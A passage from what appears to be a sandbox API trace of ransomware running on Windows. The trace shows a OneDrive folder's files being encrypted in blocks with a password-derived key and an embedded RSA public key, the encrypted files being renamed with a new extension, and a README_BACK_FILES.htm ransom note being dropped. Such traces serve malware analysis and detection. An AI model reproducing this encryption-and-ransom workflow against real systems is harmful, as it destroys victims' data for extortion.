pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.691] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.691] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.691] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.691] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.692] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.692] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.692] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.692] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.692] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.692] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.692] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.692] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.692] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.693] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.693] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.693] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.693] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.693] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.693] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.693] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.693] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.693] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.693] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.693] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.693] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.693] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.693] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.694] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.694] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.694] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.694] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.694] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.694] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.694] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.694] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x50, lpOverlapped=0x0) returned 1 [0276.694] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x50, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x60) returned 1 [0276.694] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x60, lpOverlapped=0x0) returned 1 [0276.695] CloseHandle (hObject=0x5d48) returned 1 [0276.695] CloseHandle (hObject=0x5d3c) returned 1 [0276.695] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hy\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hy\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0276.701] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0276.701] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hy\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0276.703] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hy\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hy\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0276.705] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0276.705] CryptDestroyKey (hKey=0x2fb808) returned 1 [0276.705] CryptReleaseContext (hProv=0x2f2a960, dwFlags=0x0) returned 1 [0276.705] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0276.705] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0276.705] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hy\\readme_back_files.htm")) returned 0xffffffff [0276.705] AreFileApisANSI () returned 1 [0276.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0276.706] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hy\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0276.707] GetFileType (hFile=0x5d4c) returned 0x1 [0276.707] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0276.708] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0276.708] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0276.709] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.709] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.709] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0276.709] GetLastError () returned 0x0 [0276.723] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\id\\filesync.localizedresources.dll.mui")) returned 0x20 [0276.723] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0276.724] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\id\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0276.725] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\id\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0276.726] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0276.727] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a0e0) returned 1 [0276.729] CryptCreateHash (in: hProv=0x2f2a0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0276.729] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0276.729] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0276.729] CryptDeriveKey (in: hProv=0x2f2a0e0, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb488) returned 1 [0276.729] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0276.729] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0276.729] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2b268) returned 1 [0276.730] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2b268, dwCertEncodingType=0x1, pInfo=0x2f35830*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35860*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35868*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb808) returned 1 [0276.730] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0276.730] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2b378*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2b378*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0276.730] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2b378*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2b378*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0276.731] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.735] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.735] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.737] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.738] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.738] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.738] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.738] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.738] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.738] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.738] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.738] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.738] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.738] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.738] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.739] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.739] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.739] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.739] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.739] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.739] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.739] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.739] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.739] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.739] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.739] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.739] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 